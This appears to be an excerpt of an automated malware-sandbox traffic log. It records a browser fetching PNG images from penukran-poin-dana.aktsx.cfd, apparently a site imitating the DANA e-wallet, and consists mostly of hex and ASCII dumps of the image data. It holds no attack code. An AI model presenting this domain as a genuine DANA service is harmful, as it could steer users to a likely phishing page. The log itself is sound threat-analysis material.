                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 7e 00 00 00 70 08 06 00 00 01 6e a0 2b ae 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 31 a9 49 44 41 54 78 01 ed 7d 07 98 15 35 f7 fe b2 bb b0 2c 20 bd f7 ce d2 55 ba 4a 11 41 fe a0 58 10 44 f4 93 ce 27 a0 a8 88 20 cd f2 47 11 01 0b f8 09 08 82 52 a4 88 22 45 a4 23 8a 52 94 8e d2 41 a9 d2 9b ac c0 52 96 df 7b 2e e4 92 9d 9b 99 49 e6 ce 6d bb b9 cf b3 3b 33 c9 c9 c9 c9 9b 4c 26 39 39 39 89 8a 32 f9 8d 18 31 a2 dc b9 73 e7 fe 31 89 0e 9b e0 74 46 49 6e e0 67 0c 63 cf e9 f0 63 f7 e1 72 8d 66 82 f4 ed db b7 a4 95 f0 44 67 17 cf 78 05 f3 ea 45 54 45 b8 70 aa 09 4f 0d a8 08 4f e8 fe f1 c7 1f 0b 78 94 29 3d ff e3 e3 d8 fd 8e 1d 3b 96 da d1 d8 c5 9f 3c 79 72 bf 90 86 05 22 b3 f4 ec 9e ae 2c 73 76 35 8b a3 f0 65 cb 96 d5 5d b1 62 45 67 46 c3 d2 d0 b5 73 e7 ce 85 59 f8 cf 3f ff fc 36 bb e7 69 58 d8 8f 3f fe 78 3f bb e7 e3 e7 ce 9d db 82 c2 ff fd f7 df eb 1b 37 6e 1c 9d 82 26 c5 03 9f ca 70 cf e8 e8 ca 47 89 9e 57 ad 5a 35 99 d1 b0 74 ec b9 7b [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDR~pn+gAMAa1IDATx}5, UJAXD' GR"E#RAR{.Im;3L&99921s1tFIngccrfDgxETEpOOx)=;<yr",sv5e]bEgFsY?6iX?x?7n&pGWZ5t{EiX<])0#%K?~wc$Kd2:OB.Rt\':z,G7 KqetbE_},1gtOO^%6.hU>-|FEXl c<M6:]cbbnz|3gN0.\Hs#~M<o3f,.Ew[*[!%H+=z*>eg_o[c44))o>mGLONN.&(:::jq=Ii{aq,]>@Wa<e)ox<8hY<]Y8F={U+WhXz{+Tth/]d::q1#/3Y/{5j=4,2/:<1'3g3:/,Jm|v_4vW02xXOpk,gfz=/Mg"^U<HP1]ntO4|=<%c|fpy>dB_2({YjC+AUILLGT(cYb2U}>~1k
                                                                                                                            Oct 6, 2024 13:50:07.657418966 CEST1236INData Raw: 1d ca 23 e0 33 b2 27 a0 79 02 7f ef f1 f6 24 de 81 9f bf 7c 52 6b 7a ef 8c 9e a9 7d dd 2e 68 16 fc ec 2a f5 d4 a9 53 3b 8c 7f 78 83 7e 1a 39 72 64 35 a7 f2 2c 5e bc b8 f5 e9 d3 a7 ff 38 72 e4 c8 d2 84 84 84 5c 4e f8 90 f2 f5 16 8f 85 48 9f d5 09
                                                                                                                            Data Ascii: #3'y$|Rkz}.h*S;x~9rd5,^8r\NHhl80}&A[n=[ODKa"ZQYz9Q:>Yy^t/Jxz!)2m%iP6g<>pv_,4k=U+e{*
                                                                                                                            Oct 6, 2024 13:50:07.657433033 CEST448INData Raw: 0b 85 6d db b6 ad 42 a3 ba 6e e4 47 fb 8c 82 f9 c3 9b 44 6b e2 96 99 06 15 7c 08 23 7c 5d dd 04 25 77 ee dc a5 dc e4 e7 94 17 86 a5 09 76 69 a3 b7 6f df 6e 3a fb b4 4b cc c5 c7 55 ad 5a d5 d1 5c 81 e3 21 bc a5 3e 92 45 ec de bd 7b 2d bb 4f 0d d7
                                                                                                                            Data Ascii: mBnGDk|#|]%wvion:KUZ\!>E{-O+>PPI7K)=ma=z^Lal_\:(P1M614Ps!$_?\E8G;V|PL*qfN&R|p4iB3!f>`
                                                                                                                            Oct 6, 2024 13:50:07.657447100 CEST1236INData Raw: ec d8 16 cc 37 9e 71 90 a7 4e a2 11 08 3e 02 2b 57 ae 7c c1 aa 41 fb 1b 47 2a 21 ac e0 3d 12 fc 92 e9 1c 35 02 02 04 a0 4d 59 e8 6f a3 76 9a 1e 8e b9 46 08 44 d2 41 1a 81 c0 21 d0 b5 6b d7 42 4e 1b 6c 20 d2 c1 03 18 69 c0 3c 1a b5 c0 95 5a 73 4e
                                                                                                                            Data Ascii: 7qN>+W|AG*!=5MYovFDA!kBNl i<ZsNt)g [<oiin(<6En5@f<E-]tV8iS)Z.+Vy!_[OHlHq6vfV_[n_XCVrPw/9q51);9
                                                                                                                            Oct 6, 2024 13:50:07.657474995 CEST1236INData Raw: c8 67 a6 ed 71 2a 2b 9c ef ac 56 c9 9f d1 f2 9e 27 f8 bc cd 1c 9e b1 74 c6 2b ef 08 8d f1 b1 72 76 60 4c 0f 35 a5 d0 a8 11 74 4a 0b 77 2c 6f fe 0a d5 a3 e9 18 dc 28 07 ef 6c 8d e7 61 a4 b3 79 4e 71 d4 10 cf c7 5b 18 b8 76 2a 41 8d 33 26 c6 da 42
                                                                                                                            Data Ascii: gq*+V't+rv`L5tJw,o(layNq[v*A3&BfRVFFCxl.b?MC/4\:&{nK,ZdQZo`saK!G`y^El 4"(Ct=<"Wae&LH$4zV@
                                                                                                                            Oct 6, 2024 13:50:07.657490015 CEST1236INData Raw: a3 92 be b7 cb d0 2e fe b3 cf 3e 6b 66 56 3e 95 70 58 c3 fa b5 e9 7f e1 c2 85 c2 e3 89 54 64 20 da b5 6b d7 0e b7 2b b3 55 3c 0e 22 7c 5f 35 4f 11 fd d2 a5 4b db fa e4 f3 fd f7 df b7 17 11 bb 1d 06 5f f5 bf a3 62 ab f9 08 20 17 10 2f 3a fc 4e 24
                                                                                                                            Data Ascii: .>kfV>pXTd k+U<"|_5OK_b /:N$#6Wcr</v\$*?)`%mm.ya;k/s%qV='gfW|>#hqz|hS}o`J^n_j>'`2{4y7CziBBBg
                                                                                                                            Oct 6, 2024 13:50:07.657504082 CEST1236INData Raw: 9f 55 ef 31 2c 2d 81 c9 e6 4e 54 ba d4 97 0c c3 3d a9 b1 bd aa 1c e1 42 0f 97 f7 ad 31 99 be 5f 46 1e 6a f8 58 89 2f 62 46 1b 8b cf f5 5e 00 2c 9c 59 9b 25 8a 84 70 98 27 ec 08 a6 9c 58 56 7f 40 94 1f cc 69 97 8b c2 65 c3 60 9a 90 01 c7 ab 46 d4
                                                                                                                            Data Ascii: U1,-NT=B1_FjX/bF^,Y%p'XV@ie`FAlN0NNDgc`jx`{[t-M*W!KD3Cyy|Qa)<DH{TI?/h&7&Q$j_8t/bYZhC: qEFXK
                                                                                                                            Oct 6, 2024 13:50:07.657520056 CEST328INData Raw: 6d 86 23 22 37 38 7d 11 d0 e0 6f 60 eb df 0a b8 9f ae 13 ca 72 e8 bc d3 0e 02 56 8b 5c 8e 51 a0 4d e8 4f 3d f5 14 1d df d3 18 be 2a 2b 67 c9 92 25 0f b6 05 66 27 03 3b 18 6e 5d c7 e1 05 e7 b1 82 7c 0c c6 68 9b 31 89 5e 0c 43 aa c5 30 62 3a ee 38
                                                                                                                            Data Ascii: m#"78}o`rV\QMO=*+g%f';n]|h1^C0b:8CP#4~r&ya7_[[ P7^&Hu{_xw`R#dxh4eNxL/9VEa:tvs|/RQF@#'
                                                                                                                            Oct 6, 2024 13:50:07.657535076 CEST1236INData Raw: 48 6d e2 46 47 1b ee 3c 68 bd 00 fb 89 5b a6 d5 ca d6 e5 d6 08 68 04 d2 30 02 8b 16 2d 7a 12 9b ad 84 07 81 87 7b e7 ed 96 7c 70 c3 f3 cb 47 1f 7d 74 77 1a 6e 06 ba e8 1a 01 8d 40 6a 47 e0 b1 c7 1e cb 0e 0f fa 53 9d da 74 ba d5 e1 86 1b 1f 6c b3
                                                                                                                            Data Ascii: HmFG<h[h0-z{|pG}twn@jGStlgQzqjt4iA7y`JzcucUtRZiG@ O[( bC"h5@<nl]Wqd+ij41);Hd<x^7BH@/
                                                                                                                            Oct 6, 2024 13:50:07.657552004 CEST1236INData Raw: ed b7 5d 48 d7 ee 4f bb 64 69 81 5b 32 06 22 97 50 96 24 52 29 ba f1 db b7 6f df da 9a 35 6b 06 4d fd 83 51 fe 20 b7 64 07 1e d7 d0 8e 2e 02 0f d7 fa 88 6d db b6 4d 45 65 c6 9a 56 a8 bb 11 b1 3b 77 ee 9c ed 46 3d 12 0f 7a 6f d0 61 5f 24 5c dc e2
                                                                                                                            Data Ascii: ]HOdi[2"P$R)o5kMQ d.mMEeV;wF=zoa_$\5MqHq]B%*=n2gHIOj4zns.*R?=zIQ_#?3"#eB/daY`pNxs]i6
                                                                                                                            Oct 6, 2024 13:50:07.662420034 CEST1236INData Raw: b0 08 35 05 6a 16 29 31 e2 e2 e2 a2 8b 16 2d aa 6a 61 64 c9 1b a3 c4 18 74 18 2a 6a 8a eb a7 4f 9f 4e b6 64 ea 47 24 b0 a0 85 3c 29 0e 78 97 a3 b2 64 c9 a2 22 bb 2d 5f c2 18 44 f4 27 f5 83 bc 49 20 94 ab 40 29 8e 29 89 b0 96 21 8d 35 9c 0e 46 63
                                                                                                                            Data Ascii: 5j)1-jadt*jONdG$<)xd"-_D'I @))!5Fcig_i< 3ly>}yEW^zYrAAjJ7b&on,KXikjB4JDc@VJ4qH.VFTI`J#TG[ !;l<ER]Ri3<@NC
                                                                                                                            Oct 6, 2024 13:50:09.342638969 CEST304OUTGET /asset/img/dana_text.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:09.670089006 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 10588
                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 e0 00 00 00 76 08 06 00 00 00 10 9c 40 7f 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 7b 78 9c 57 7d e7 bf bf f3 ce 68 a4 91 c6 92 6d c9 b2 62 3b 11 89 21 89 53 6e b1 21 40 d2 20 3f dd 66 cb bd 85 75 d2 3e dd 96 6b 6f cb 25 d0 74 81 c0 52 14 1a 68 a1 85 2e 6d b9 b4 0b 5d 5a 1a 58 64 9a 2e 94 72 ed 62 71 29 2d d4 22 0d c5 4e 1a 2b 8e 82 65 c9 b2 64 59 b7 91 e6 f2 be e7 bb 7f 9c 77 ec b1 e2 8b 64 cd 79 e7 7d 35 e7 f3 3c 7a 6c 49 af e6 9c f7 bc e7 3d bf f3 bb 1e c0 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c eb 8a 81 81 01 6f 72 72 32 47 72 c3 a9 53 a7 36 90 bc d8 57 fb 2a 7e 77 b1 6b 57 d4 ce e4 e4 64 6e 6c 6c 2c 4b b2 89 64 9a 64 8a a4 47 52 f5 f7 f7 2b 92 52 ef f1 73 d4 1e 92 12 7e a9 f0 79 a7 49 66 c6 c6 c6 b2 27 4f 9e 6c 23 99 0b bf da 4e 9c 38 d1 1a ce 91 0c c9 f4 81 03 07 52 e1 df 89 9b 1f c9 a5 ea f9 57 cf 81 66 92 59 92 ad e1 f3 [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDRv@sRGBsBIT|d IDATx{xW}hmb;!Sn!@ ?fu>ko%tRh.m]ZXd.rbq)-"N+edYwdy}5<zlI=p8p8p8p8orr2GrS6W*~wkWdnll,KddGR+Rs~yIf'Ol#N8RWfY099#Gd<;@2^8qD+*y@,,P/fT;*7 r}0s"U?;_T?oU@Yy)8>?44TgOFco}Zlj[lL2+"-R$"RZ/WJ=yG;JUsCHz|[kkfv+`@fL<EY1~3ni.5`[)**@ O "0R(8`@AD:fwgVqVdYDNA|*lFHl.{vyM3+sD(pLkeN>=q%X['x}}}BPu)@qGE~p@1&pkD}d0sE$s>k3"rX8vXs} AT*LKv1 y<NrZiA|zFBdw|89@R<E({K


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.649740165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:50:06.463124037 CEST302OUTGET /asset/img/load_bg.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:08.755482912 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 7863
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 04 00 00 00 d3 74 46 fe 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 01 1c 9a 07 63 00 00 1d 8b 49 44 41 54 78 da ed 9d d9 6f 64 47 76 a7 bf 73 6f 6e cc 4c 92 c9 2d b9 6f b5 48 55 25 95 aa 54 da bb 5b 52 6b 6d 61 ba a7 0d 5b f0 8b fb c1 f0 c3 3c ce f2 34 c0 60 80 99 bf c0 2f f3 34 b0 81 01 c6 30 da 63 f7 00 83 6e 60 ec 1e 49 2d 95 dd b2 d4 56 ab a4 5a 54 7b 15 c9 e2 be 6f c9 25 d7 1b f3 90 cc 22 8b 64 92 99 cc e5 de cb 8c 8f 28 56 ee 8c 88 fc dd 13 27 4e 9c 88 10 34 db 08 02 18 f8 09 10 c0 8f 0f 03 03 03 13 c1 c0 04 2c 2c 2c 32 28 32 58 24 49 10 27 4e 02 0b 50 28 bb 2b e0 1c c4 ee 02 d8 8c 41 90 10 1e 0c ea 69 23 82 1f 0f de c7 ff 4c 04 c1 40 b6 7e b2 e2 c9 fe 58 28 32 a4 48 3f fe 97 60 99 39 62 58 a4 59 67 03 [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDR,,tFgAMAa cHRMz&u0`:pQ<bKGDtIMEcIDATxodGvsonL-oHU%T[Rkma[<4`/40cn`I-VZT{o%"d(V'N4,,,2(2X$I'NP(+Ai#L@~X(2H?`9bXYgI- I=4>m{Y!s+'IY&*C cwM-CvixrwaB[M':c,knjq%hN:@S,qvC0vMebnU!M+Pq-@Mab~/a9C;MxtwG/-@%f,K.*~L0H-QaX`X;# `z.RB#1):nKEs<!s$.Niq'r>B.S!qaV.Q+>Vd[c}t|tr4!k# (&S$:9A?U(l0mF08s)IDH05wr|JV\Wv.,?'H>jIFsXAI?/0X_>$|#F*,K<MH*:w)g3yB%npEgD;U|wN%,W9W|Z;oawA\AxYtNt)29\IWPMVV?u1A,iwQ ,xq
                                                                                                                            Oct 6, 2024 13:50:08.755501032 CEST1236INData Raw: 1f dd 74 b1 c9 b2 dd ad 69 b7 b0 42 bc ca 9b b4 da 5c 8a e3 45 23 03 f8 98 23 65 67 21 ec 14 96 d0 cb bb 5c d0 91 f5 b2 e3 a3 87 76 56 ed 4c 12 b4 4f 58 7e 9e e7 5d ba b5 5f 55 11 84 16 06 50 cc db 35 e9 63 97 b0 1a 79 83 57 08 6b 5b 55 41 ea e8
                                                                                                                            Data Ascii: tiB\E##eg!\vVLOX~]_UP5cyWk[UA#=9]Kt2+vjYUI&PVxV:0[Qbu\&1_Ma#N@[0h#bSGwf/XVVuerwi]#YySA^M+/
                                                                                                                            Oct 6, 2024 13:50:08.755515099 CEST448INData Raw: 8d 33 b8 77 93 a3 bd c2 ea a6 51 db 2b 4d 11 28 1a f6 1e 2a b8 57 58 83 3a 15 59 53 24 7e 06 77 4f 47 ef 16 56 44 6f 54 a4 29 1a 45 cf ee ed 42 76 0b ab 4d 2f a5 2f 1d 41 1e 5f c0 3b 6f 03 6a eb c7 7a fc a3 72 af 33 44 dc ba 59 a2 a2 65 77 98 d4
                                                                                                                            Data Ascii: 3wQ+M(*WX:YS$~wOGVDoT)EBvM//A_;ojzr3DYewE`ja1PC,e4yol=]4AL~??_JG2&i7}&O`rVND4F#"t&Hy|R">3.".B|`'gZRg
                                                                                                                            Oct 6, 2024 13:50:08.755528927 CEST1236INData Raw: 87 e3 f1 4d 2b a9 1c ee 72 09 ab fc 9c b9 ed bb db 5c e4 03 4a be d2 6a 89 b0 d9 e9 7f b5 f9 85 f6 d7 06 4f f7 45 1a a5 22 a9 dc f1 cd 1b f7 ff f2 ab ff 3b 3d 93 74 b8 b0 20 c3 ff e3 9b dc 9d 6d 21 09 5d 78 b5 bd ca 8f 29 6a 2b 88 a0 00 9f 3c 1d
                                                                                                                            Data Ascii: M+r\JjOE";=t m!]x)j+<q?{+8xD;/b9)l[z>QU-02?UIIM5NU5;w'aJFlf2;F{O!o-_h~]oB
                                                                                                                            Oct 6, 2024 13:50:08.755543947 CEST1236INData Raw: 45 0c a7 a2 ec 5d 0b ee 48 5c d5 15 ba 67 2b fd 0a e2 9a 63 9c 0c 17 58 2b 8d eb 10 30 b0 dc b0 54 15 d0 7e 96 7b 50 28 63 fb c4 3c 87 23 3a fa ee 1a 14 96 a3 37 b4 d5 b8 14 85 e5 1e 8b a5 71 0f 5b 5d a1 5b 7c 2c 8d 5b 50 28 dd 15 6a 2a 81 65 90
                                                                                                                            Data Ascii: E]H\g+cX+0T~{P(c<#:7q[][|,[P(j*e+5XX)2v0\~i8^NR6GT8Ssr)6\9B2',XZX22@KSf2`H((Q0)#VzZSF,2qV@jFt+\ruR
                                                                                                                            Oct 6, 2024 13:50:08.755558968 CEST1236INData Raw: 60 57 87 af 4c 33 6b 6b 6b 73 0b 43 53 9f 0d fd 76 e6 d1 46 dc 52 ac a6 13 96 b6 4f 05 22 c4 f8 79 2e 8a f5 a4 b0 02 fc 31 03 ee 68 47 41 c4 44 11 32 cf 85 7f d2 fb da c0 99 fe 96 c8 51 e5 a5 ac 78 62 61 71 7a f1 c1 f4 95 a9 cb 33 8f 36 17 d2 1e
                                                                                                                            Data Ascii: `WL3kkksCSvFRO"y.1hGAD2Qxbaqz36RJa`)Ct#!,(frC[^~DgK+tJ%?Mk~vyB)^x/6}2z<xdg'U"i~O6g?
                                                                                                                            Oct 6, 2024 13:50:08.755762100 CEST1236INData Raw: 6e 0f 4d 19 10 c6 f8 98 95 d2 3f a8 3c 71 a8 0d 16 e8 26 6c 73 a3 68 4a 45 98 2b d5 69 cf 51 ae 00 e7 2a ab f4 11 b0 b1 51 34 a5 22 ac f2 71 b9 b6 07 2d 5f e4 7c 91 04 7d 7a 7c e8 5a b2 63 c1 9b e5 fa b8 72 4e c9 cc 01 dd 7a 81 98 2b 11 92 7c 59
                                                                                                                            Data Ascii: nM?<q&lshJE+iQ*Q4"q-_|}z|ZcrNz+|Y|:_~),^:\6- =:,O%!\;.||0RL&?dww$^PG;4M:u(JLEwFqOXW.4g\ZFq<SSD
                                                                                                                            Oct 6, 2024 13:50:08.755774975 CEST242INData Raw: 7c f8 f0 e2 c1 44 60 4b 6e d9 df 59 eb 96 fb 9d 21 4d 8a 24 49 d2 a4 49 b2 c8 34 eb 58 24 89 b9 23 07 a1 72 68 61 ed 24 2b 1e 0f 75 84 a8 c3 8f 67 87 25 db 16 56 d6 2e 29 2c d2 24 d9 60 9d 4d d2 e0 c0 d1 a7 8d fc 7f 14 8e 09 88 65 e1 68 00 00 00
                                                                                                                            Data Ascii: |D`KnY!M$II4X$#rha$+ug%V.),$`Meh%tEXtdate:create2022-10-30T18:13:39+00:00X%tEXtdate:modify2022-10-30T17:23:31+00:00(tEXtdate:timestamp2022-11-01T06:12:00+00:00}IENDB`
                                                                                                                            Oct 6, 2024 13:50:08.755882025 CEST242INData Raw: 7c f8 f0 e2 c1 44 60 4b 6e d9 df 59 eb 96 fb 9d 21 4d 8a 24 49 d2 a4 49 b2 c8 34 eb 58 24 89 b9 23 07 a1 72 68 61 ed 24 2b 1e 0f 75 84 a8 c3 8f 67 87 25 db 16 56 d6 2e 29 2c d2 24 d9 60 9d 4d d2 e0 c0 d1 a7 8d fc 7f 14 8e 09 88 65 e1 68 00 00 00
                                                                                                                            Data Ascii: |D`KnY!M$II4X$#rha$+ug%V.),$`Meh%tEXtdate:create2022-10-30T18:13:39+00:00X%tEXtdate:modify2022-10-30T17:23:31+00:00(tEXtdate:timestamp2022-11-01T06:12:00+00:00}IENDB`
                                                                                                                            Oct 6, 2024 13:50:08.756309032 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 7863
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 04 00 00 00 d3 74 46 fe 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 01 1c 9a 07 63 00 00 1d 8b 49 44 41 54 78 da ed 9d d9 6f 64 47 76 a7 bf 73 6f 6e cc 4c 92 c9 2d b9 6f b5 48 55 25 95 aa 54 da bb 5b 52 6b 6d 61 ba a7 0d 5b f0 8b fb c1 f0 c3 3c ce f2 34 c0 60 80 99 bf c0 2f f3 34 b0 81 01 c6 30 da 63 f7 00 83 6e 60 ec 1e 49 2d 95 dd b2 d4 56 ab a4 5a 54 7b 15 c9 e2 be 6f c9 25 d7 1b f3 90 cc 22 8b 64 92 99 cc e5 de cb 8c 8f 28 56 ee 8c 88 fc dd 13 27 4e 9c 88 10 34 db 08 02 18 f8 09 10 c0 8f 0f 03 03 03 13 c1 c0 04 2c 2c 2c 32 28 32 58 24 49 10 27 4e 02 0b 50 28 bb 2b e0 1c c4 ee 02 d8 8c 41 90 10 1e 0c ea 69 23 82 1f 0f de c7 ff 4c 04 c1 40 b6 7e b2 e2 c9 fe 58 28 32 a4 48 3f fe 97 60 99 39 62 58 a4 59 67 03 [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDR,,tFgAMAa cHRMz&u0`:pQ<bKGDtIMEcIDATxodGvsonL-oHU%T[Rkma[<4`/40cn`I-VZT{o%"d(V'N4,,,2(2X$I'NP(+Ai#L@~X(2H?`9bXYgI- I=4>m{Y!s+'IY&*C cwM-CvixrwaB[M':c,knjq%hN:@S,qvC0vMebnU!M+Pq-@Mab~/a9C;MxtwG/-@%f,K.*~L0H-QaX`X;# `z.RB#1):nKEs<!s$.Niq'r>B.S!qaV.Q+>Vd[c}t|tr4!k# (&S$:9A?U(l0mF08s)IDH05wr|JV\Wv.,?'H>jIFsXAI?/0X_>$|#F*,K<MH*:w)g3yB%npEgD;U|wN%,W9W|Z;oawA\AxYtNt)29\IWPMVV?u1A,iwQ ,xq
                                                                                                                            Oct 6, 2024 13:50:08.756625891 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 7863
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 04 00 00 00 d3 74 46 fe 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 01 1c 9a 07 63 00 00 1d 8b 49 44 41 54 78 da ed 9d d9 6f 64 47 76 a7 bf 73 6f 6e cc 4c 92 c9 2d b9 6f b5 48 55 25 95 aa 54 da bb 5b 52 6b 6d 61 ba a7 0d 5b f0 8b fb c1 f0 c3 3c ce f2 34 c0 60 80 99 bf c0 2f f3 34 b0 81 01 c6 30 da 63 f7 00 83 6e 60 ec 1e 49 2d 95 dd b2 d4 56 ab a4 5a 54 7b 15 c9 e2 be 6f c9 25 d7 1b f3 90 cc 22 8b 64 92 99 cc e5 de cb 8c 8f 28 56 ee 8c 88 fc dd 13 27 4e 9c 88 10 34 db 08 02 18 f8 09 10 c0 8f 0f 03 03 03 13 c1 c0 04 2c 2c 2c 32 28 32 58 24 49 10 27 4e 02 0b 50 28 bb 2b e0 1c c4 ee 02 d8 8c 41 90 10 1e 0c ea 69 23 82 1f 0f de c7 ff 4c 04 c1 40 b6 7e b2 e2 c9 fe 58 28 32 a4 48 3f fe 97 60 99 39 62 58 a4 59 67 03 [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDR,,tFgAMAa cHRMz&u0`:pQ<bKGDtIMEcIDATxodGvsonL-oHU%T[Rkma[<4`/40cn`I-VZT{o%"d(V'N4,,,2(2X$I'NP(+Ai#L@~X(2H?`9bXYgI- I=4>m{Y!s+'IY&*C cwM-CvixrwaB[M':c,knjq%hN:@S,qvC0vMebnU!M+Pq-@Mab~/a9C;MxtwG/-@%f,K.*~L0H-QaX`X;# `z.RB#1):nKEs<!s$.Niq'r>B.S!qaV.Q+>Vd[c}t|tr4!k# (&S$:9A?U(l0mF08s)IDH05wr|JV\Wv.,?'H>jIFsXAI?/0X_>$|#F*,K<MH*:w)g3yB%npEgD;U|wN%,W9W|Z;oawA\AxYtNt)29\IWPMVV?u1A,iwQ ,xq
                                                                                                                            Oct 6, 2024 13:50:09.342147112 CEST297OUTGET /asset/img/bi.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:09.668000937 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 16542
                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
